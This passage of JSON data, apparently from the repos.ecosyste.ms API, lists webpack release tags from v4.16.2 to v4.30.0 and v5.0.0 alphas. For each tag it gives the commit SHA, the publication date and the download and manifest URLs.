","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.30.0/manifests"},{"name":"v4.29.6","sha":"685a0626cb10664133ef2fb2e2f9f4cb3971402a","kind":"tag","published_at":"2019-02-28T09:44:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.6","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.6/manifests"},{"name":"v5.0.0-alpha.11","sha":"589e4e4d9d42401d638c442e5b83bb28213b614a","kind":"tag","published_at":"2019-02-19T10:50:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.11","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.11","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.11/manifests"},{"name":"v4.29.5","sha":"073813f1913e000302be557272b2d11195f9c2e6","kind":"tag","published_at":"2019-02-18T10:05:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.5","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.5/manifests"},{"name":"v4.29.4","sha":"7ecf992bd97204fbfaeed18e3e21fb9fcd46352f","kind":"tag","published_at":"2019-02-15T15:10:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.4/manifests"},{"name":"v5.0.0-alpha.10","sha":"2d7338d2b5cc70c6bd250a878d8a9717cc02cb95","kind":"tag","published_at":"2019-02-07T08:49:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.10","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.10","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.10/manifests"},{"name":"v4.29.3","sha":"b934e26da8b65bdf36b3c71141d0c2d8397d9f44","kind":"tag","published_at":"2019-02-07T08:22:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.3/manifests"},{"name":"v4.29.2","sha":"74b8aac0adfb0c79d70a99fa86635930db8944fd","kind":"tag","published_at":"2019-02-06T14:05:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.2/manifests"},{"name":"v4.29.1","sha":"6934b9814492b049e67efb3ccf7254d8917e01f9","kind":"tag","published_at":"2019-02-04T17:01:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.1/manifests"},{"name":"v5.0.0-alpha.9","sha":"92a36b1a9c0ed554c0f7e74bf1bc98c77a768fcc","kind":"tag","published_at":"2019-01-27T12:18:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.9","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.9","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.9/manifests"},{"name":"v4.29.0","sha":"25bccd4c487a5bf743efc62947d81a8eaa81a90f","kind":"tag","published_at":"2019-01-20T17:38:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.0/manifests"},{"name":"v5.0.0-alpha.8","sha":"adff7f61a2595ea9a04c0f3070add21be01607fb","kind":"tag","published_at":"2019-01-19T19:24:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.8","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.8/manifests"},{"name":"v5.0.0-alpha.7","sha":"18aca2fcb148d04ba3d0b37742f50534d42a7ec3","kind":"tag","published_at":"2019-01-19T12:11:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.7","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.7/manifests"},{"name":"v5.0.0-alpha.6","sha":"4be6797700753a54b223600f01e941580b6a6ba3","kind":"tag","published_at":"2019-01-15T16:39:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.6","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.6/manifests"},{"name":"v4.28.4","sha":"fdb6b139b94273e5b18870262c193a93f65132e8","kind":"tag","published_at":"2019-01-10T15:48:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.4/manifests"},{"name":"v5.0.0-alpha.5","sha":"0d9ed482bc39fb23040ffd26823e0b7ed73320cb","kind":"tag","published_at":"2019-01-09T14:20:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.5","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.5/manifests"},{"name":"v5.0.0-alpha.4","sha":"b97bc4bc062cd5395de8b00115519472645d57d0","kind":"tag","published_at":"2019-01-08T14:09:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.4/manifests"},{"name":"v5.0.0-alpha.3","sha":"762155dc2da6795dfe72a5cbeb632fc42c9c49e0","kind":"tag","published_at":"2018-12-29T17:13:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.3/manifests"},{"name":"v4.28.3","sha":"983c2616ec1b869bfb659b6331bd2fe2abc66e23","kind":"tag","published_at":"2018-12-29T11:55:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.3/manifests"},{"name":"v5.0.0-alpha.2","sha":"88f0e18e64c7935723348de3b7dd1aa92050999c","kind":"tag","published_at":"2018-12-26T10:33:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.2/manifests"},{"name":"v5.0.0-alpha.1","sha":"90a0866efcd35401353c9e8d5c904fe2cd407f7e","kind":"tag","published_at":"2018-12-23T20:24:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.1/manifests"},{"name":"v4.28.2","sha":"fe514dd975f1d2dd1546906a6f4c0a6b2a0e3761","kind":"tag","published_at":"2018-12-22T12:53:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.2/manifests"},{"name":"v5.0.0-alpha.0","sha":"3f068c38610a1edfd6be2adf53a2dea44525cfde","kind":"tag","published_at":"2018-12-21T14:17:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.0/manifests"},{"name":"v4.28.1","sha":"7a6a71f1e9349f86833de12a673805621f0fc6f6","kind":"tag","published_at":"2018-12-20T17:10:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.1/manifests"},{"name":"v4.28.0","sha":"e871eeb121a69efd6cbfa56f977d5843bf030202","kind":"tag","published_at":"2018-12-19T10:37:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.0/manifests"},{"name":"v4.27.1","sha":"4056506488c1e071dfc9a0127daa61bf531170bf","kind":"tag","published_at":"2018-12-05T19:13:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.27.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.27.1/manifests"},{"name":"v4.27.0","sha":"f47bf8b64f9698cb05eff62832a04267823039cf","kind":"tag","published_at":"2018-12-04T09:31:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.27.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.27.0/manifests"},{"name":"v4.26.1","sha":"8e841feda3ef32c64df1a175d0d9f71e47cfbe8e","kind":"tag","published_at":"2018-11-25T20:25:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.26.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.26.1/manifests"},{"name":"v4.26.0","sha":"04f90c53eeae4817a9c515a0daca119d0decfa45","kind":"tag","published_at":"2018-11-19T08:39:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.26.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.26.0/manifests"},{"name":"v4.25.1","sha":"2361995a429794d372d61e3fb628dea3929e0ca4","kind":"tag","published_at":"2018-11-05T18:12:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.25.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.25.1/manifests"},{"name":"v4.25.0","sha":"290094e10a990aa3fd8073b02b4dc57781f924d7","kind":"tag","published_at":"2018-11-05T08:37:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.25.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.25.0/manifests"},{"name":"v4.24.0","sha":"9e397b5664dab3af0ceb2fa93cb5c539f02c023c","kind":"tag","published_at":"2018-11-02T12:11:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.24.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.24.0/manifests"},{"name":"v4.23.1","sha":"607cf70eddd213a690585276f7124963536781e7","kind":"tag","published_at":"2018-10-25T08:26:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.23.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.23.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.23.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.23.1/manifests"},{"name":"v4.23.0","sha":"a4feb6e15ff7ac19bab1a458de369a887dde44fe","kind":"tag","published_at":"2018-10-24T15:45:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.23.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.23.0/manifests"},{"name":"v4.22.0","sha":"894eca20bd678ca5473cfca28f332a7322c64b8e","kind":"tag","published_at":"2018-10-21T09:34:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.22.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.22.0/manifests"},{"name":"v4.21.0","sha":"432d2a3f174b08d5f4f7de018799c97a18efa1fd","kind":"tag","published_at":"2018-10-17T17:47:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.21.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.21.0/manifests"},{"name":"v4.20.2","sha":"5c5e902c8e89afeb51ad130f12a908b89d627fc5","kind":"tag","published_at":"2018-09-25T20:31:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.20.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.2/manifests"},{"name":"v4.20.1","sha":"91e9dd77062797e3e716485f295d32a5cab57042","kind":"tag","published_at":"2018-09-25T13:25:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.20.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.1/manifests"},{"name":"v4.20.0","sha":"c4d8a3c8d67239f6457fd7560d9bea14524ff4f0","kind":"tag","published_at":"2018-09-25T07:15:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.20.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.0/manifests"},{"name":"v4.19.1","sha":"b7121c15e1cc810ead6aa0f4b2aad4666c072257","kind":"tag","published_at":"2018-09-18T07:56:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.19.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.19.1/manifests"},{"name":"v4.19.0","sha":"6bf832398c3905e06300596caddb073c583d94c4","kind":"tag","published_at":"2018-09-13T22:04:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.19.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.19.0/manifests"},{"name":"v4.18.1","sha":"c51a1bab94e4ff8ffca443e4fcb038bc4911e65e","kind":"tag","published_at":"2018-09-13T10:22:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.18.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.18.1/manifests"},{"name":"v4.18.0","sha":"ee7d9485fa30d1d3d5adbfdfb52c8f57ae8b439e","kind":"tag","published_at":"2018-09-10T15:34:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.18.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.18.0/manifests"},{"name":"v4.17.3","sha":"ee27d36e7cb0bed3ca32911165bbf01fef993e48","kind":"tag","published_at":"2018-09-10T14:25:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.17.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.3/manifests"},{"name":"v4.17.2","sha":"dfe6379052598a00f13bfa4f34ac73856ddf3dd0","kind":"tag","published_at":"2018-09-03T17:25:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.17.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.2/manifests"},{"name":"v4.17.1","sha":"ff3ef5eb284ddcd3da8c3f5bef6318e873779ffe","kind":"tag","published_at":"2018-08-22T09:50:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.17.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.1/manifests"},{"name":"v4.17.0","sha":"6f1f18f84dee330ec582d4e9c075c47c9a732102","kind":"tag","published_at":"2018-08-21T08:42:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.17.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.0/manifests"},{"name":"v4.16.5","sha":"025338cc91a867768325120d325b341bdcdc4321","kind":"tag","published_at":"2018-08-06T07:13:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.5","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.5/manifests"},{"name":"v4.16.4","sha":"1e9d98cb4e52a6efc58f516aa7451d1faa6347ba","kind":"tag","published_at":"2018-08-02T13:46:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.4/manifests"},{"name":"v4.16.3","sha":"482ff200303e84a65bdd5c456ce232309a6ce450","kind":"tag","published_at":"2018-07-27T10:14:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.3/manifests"},{"name":"v4.16.2","sha":"0d4c87fcf261de02a6ecfb05faab235c5a2a92dc","kind":"tag","published_at":"2018-07-23T09:51:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.2/manifests"},{"name":"v4